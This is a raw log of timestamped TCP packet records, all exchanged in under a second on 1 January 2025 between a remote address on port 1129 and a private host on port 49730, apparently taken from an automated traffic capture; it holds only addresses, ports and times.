Jan 1, 2025 18:10:01.160187960 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.160203934 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.160207987 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.160235882 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.160401106 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.160410881 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.160429955 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.160439968 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.160445929 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.160469055 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.160495043 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.160506010 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.160521984 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.160535097 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.160536051 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.160550117 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.160559893 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.160562992 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.160582066 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.160583019 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.160625935 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.161186934 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.161199093 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.161216021 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.161228895 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.161230087 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.161247015 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.161259890 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.161274910 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.161277056 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.161294937 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.161298037 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.161309958 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.161346912 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.161791086 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.161803007 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.161820889 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.161834002 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.161839008 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.161855936 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.161860943 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.161869049 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.161884069 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.161895037 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.161902905 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.161912918 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.161923885 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.161927938 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.161942005 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.161947966 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.161955118 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.161971092 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.161978006 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.162050009 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.215246916 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.215281010 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.215297937 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.215342045 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.215451956 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.215465069 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.215493917 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.215516090 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.215527058 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.215553045 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.225317955 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.225364923 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.225375891 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.225390911 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.225467920 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.225486040 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.225512981 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.225570917 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.225614071 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.225624084 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.225639105 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.225661993 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.225822926 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.225862980 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.225902081 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.225913048 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.225946903 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.226030111 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.226095915 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.226151943 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.226164103 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.226191044 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.226216078 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.231612921 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.231652975 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.231667995 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.231708050 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.231719971 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.231766939 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.231815100 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.231827974 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.231874943 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.231969118 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.231983900 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.232000113 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.232024908 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.232100964 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.232125998 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.232141972 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.232161045 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.232193947 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.232310057 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.232405901 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.232419968 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.232435942 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.232448101 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.232459068 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.232462883 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.232489109 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.232501030 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.232661963 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.232700109 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.232714891 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.232753038 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.232881069 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.232928038 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.239342928 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.239398956 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.239413023 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.239430904 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.239550114 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.239562035 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.239579916 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.239587069 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.239614010 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.239696026 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.245253086 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.245277882 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.245290995 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.245318890 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.245352030 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.245412111 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.245424032 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.245441914 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.245455027 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.245460033 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.245501041 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.245640039 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.245650053 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.245666981 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.245681047 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.245682001 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.245697021 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.245726109 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.245784044 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.245795965 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.245815039 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.245822906 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.245830059 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.245848894 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.246014118 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.246025085 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.246047974 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.246056080 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.246083021 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.246139050 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.246150017 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.246170044 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.246177912 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.246187925 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.246221066 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.246279955 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.246371984 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.246387959 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.246398926 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.246409893 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.246417046 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.246431112 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.246437073 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.246453047 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.246462107 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.246473074 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.246495008 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.246681929 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.246694088 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.246711016 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.246723890 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.246726036 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.246741056 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.246774912 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.246949911 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.246967077 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.246987104 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.246995926 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.247004986 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.247023106 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.247092962 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.247106075 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.247127056 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.247129917 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.247159004 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.247185946 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.247203112 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.247214079 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.247231960 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.247242928 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.247257948 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.247262001 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.247267962 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.247277021 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.247299910 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.247668982 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.247680902 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.247698069 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.247715950 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.247720957 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.247731924 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.247745037 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.247745037 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.247761965 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.247770071 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.247795105 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.247971058 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.247982979 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.248001099 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.248022079 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.248034000 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.248039007 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.248049021 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.248053074 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.248069048 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.248083115 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.248095036 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.248095036 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.248116016 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.248127937 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.248159885 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.301983118 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.302124977 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.302135944 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.302154064 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.302165985 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.302174091 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.302196026 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.302275896 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.302287102 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.302310944 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.302313089 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.302352905 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.312068939 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.312108040 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.312118053 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.312160969 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.312191010 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.312202930 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.312232971 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.312320948 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.312330961 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.312347889 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.312365055 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.312386036 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.312438011 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.312640905 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.312676907 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.312690973 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.312701941 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.312740088 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.312764883 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.312860012 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.312872887 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.312908888 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.312994957 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.313005924 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.313045025 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.318640947 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.318670988 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.318682909 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.318685055 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.318727970 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.318749905 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.318845987 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.318862915 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.318880081 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.319027901 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.319040060 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.319058895 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.319068909 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.319072008 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.319101095 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.319269896 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.319283962 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.319304943 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.319400072 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.319418907 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.319433928 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.319562912 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.319575071 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.319592953 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.319607019 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.319608927 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.319623947 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.319631100 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.319663048 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.319890022 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.319905043 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.319936037 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.327383041 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.327408075 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.327419996 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.327433109 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.327451944 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.327455997 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.327461958 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.327466965 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.327482939 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.327495098 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.332066059 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.332119942 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.332132101 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.332168102 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.332184076 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.332200050 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.332289934 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.332304955 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.332326889 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.332350016 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.332386971 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.332410097 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.332482100 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.332490921 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.332509995 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.332520008 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.332529068 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.332545996 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.332659006 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.332669973 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.332700968 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.332719088 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.332777977 CET	49730	1129	192.168.2.4	45.200.148.158
